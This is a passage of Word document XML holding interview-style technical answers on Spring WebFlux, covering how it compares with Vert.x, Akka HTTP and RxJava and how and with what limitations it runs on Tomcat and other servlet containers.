    <w:p w14:paraId="2583EC7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ava-Centric</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux is primarily designed for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be a limitation if you want a cross-platform solution. For polyglot environments or mixed language systems, other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may be more attractive due to their support for multiple programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5112711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and Cons Compared to Other Reactive Frameworks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A12A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Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA04C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34953E86"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integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a major advantage for teams already using the Spring ecosystem. It simplifies development when integrating with existing Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C6F6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programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a familiar annotation-based approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B6C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6FA919B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might offer better </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>raw performanc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certain scenarios due to its more lightweight, event-loop architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D1C6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can also handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal resources due to its non-blocking, event-driven model, whereas Spring WebFlux can incur some overhead because of the richer abstraction layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47BD3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Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D31BA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27CC6EB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tegrates seamlessly into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and is easier to set up for developers already familiar with Spring's conventions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0D89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is more suited for distributed systems, and Spring WebFlux might feel more appropriate for traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or simple APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494319B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2E3D4B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kka HTTP's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can be more efficient for large-scale,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especially when handling high levels of concurrency with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-latency requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For reactive systems that rely on complex event-driven architectures, Akka may outperform Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A002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RxJava:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365775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46A133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which is the reactive programming framework provided by Spring, whereas RxJava is often used separately. WebFlux provides a complet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tack for building web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B59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llows both functional and annotation-based routing, offering flexibility over RxJava's more functionally focused approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C547F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5565AB8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offers more operator-rich APIs and is more mature as a standalone reactive programming library, whereas Spring WebFlux is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-centric</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and may be less flexible for custom client-side logic or non-web-based reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38728F7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DF5D8B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n excellent choice for reactive, web-based applications within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offering flexibility, scalability, and seamless integration with other Spring components. However, for simpler applications, debugging challenges, and situations requiring extreme low-latency handling,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may provide better performance and lower complexity. It all depends on your application's requirements, team expertise, and the existing tech stack you're working with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4370D1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337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CC783" w14:textId="7FE58C3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7" w:name="_Toc197867761"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can Spring WebFlux be used in a traditional servlet container like Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
    </w:p>
    <w:p w14:paraId="24BEC34E" w14:textId="566EE933" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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Yes, Spring WebFlux can run on a traditional servlet container like Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but with an important distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557599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pported Mode on Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43157A15"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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can run on 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ly in "servlet 3.1+ non-blocking I/O mode"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F94B4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does not use the traditional Servlet API (Spring MVC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead leverages the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1 asynchronous, non-blocking support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the ServletHttpHandlerAdapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8A500"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19D94">
          <v:rect id="_x0000_i2338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6EC72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7440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="2F68CFDD" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DB921E"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de</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3981460A"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252DBFAD" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62FB302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let-based (e.g., Tomcat, Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5972D3A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s on servlet containers using non-blocking Servlet 3.1 APIs. Uses adapters internally to bridge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="5611E45C" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671F10CF"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erver (Netty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD4C18C"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ully non-blocking I/O and event-loop based. Preferred for full reactive stack performance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="077288B9"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6F70D">
          <v:rect id="_x0000_i2339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3D8E1"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Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D4080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running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Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943E727"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s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1+ HttpServletRequest and HttpServletResponse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07A66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raps these in a ServerHttpRequest and ServerHttpResponse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986773B"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gates request handling to HttpWebHandlerAdapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469901C7"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0A815">
          <v:rect id="_x0000_i2340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E605F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Supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718074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Servlet containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Tomcat 7 or older do </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68007329"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servlet APIs (Spring MVC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not used in WebFlux — they are mutually exclusive stacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744ED0D2"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CF8EE">
          <v:rect id="_x0000_i2341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADFBD5"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Cases for Running WebFlux on Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2D1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in a Spring Boot application and don’t want to use Netty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A1606"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ploying to environments where Tomcat is required or embedded by policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BB79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ncrementally migrate a Spring MVC app to reactive (although partial mix is not recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE629C"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6B15B">
          <v:rect id="_x0000_i2342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819DD34"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2347E843"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aximum performance and full non-blocking capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, prefer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spring-boot-starter-webflux defaults to it). Use Tomcat only if you have legacy requirements or infrastructure constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A61A0D"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 me know if you want a quick config example to switch between Netty and Tomcat for WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82D9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343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECF0DD" w14:textId="3198182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48" w:name="_Toc197867762"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If so, what are the limitations when running Spring WebFlux in a servlet container</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="548"/>
    </w:p>
    <w:p w14:paraId="043B47BF" w14:textId="76C7C4A2" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux can run in a servlet container</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but there are several </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to running it on a fully reactive server like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Here’s a breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C0A01"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849CF">
          <v:rect id="_x0000_i2344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758BB3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8223"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3654143B" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12138B72"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Limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D9530F"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19C215D2" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5298F499"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1. Servlet API Constraints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50EC714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ervlet containers use the Servlet 3.1+ non-blocking I/O API, which introduces </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>some blocking points</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> internally. It’s not as efficient or scalable as Netty’s event loop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="191214A7" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45CBE4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2. Thread-Per-Request Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39FC248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ven though Servlet 3.1 supports async/non-blocking, servlet containers may still use </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>more threads</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> compared to the </w:t>
            </w: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xml:space="preserve"> of Netty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="53420144" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF1AB0"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3. Performance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099FD1D8"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dditional </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>adapters/wrappers</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (like ServletHttpHandlerAdapter) are used to bridge WebFlux with the servlet API, which introduces </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>latenc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overhead</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6557FC9C" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2637779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4. No Full Reactive Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F3357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eatures like </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive socket communicati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 with backpressure</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
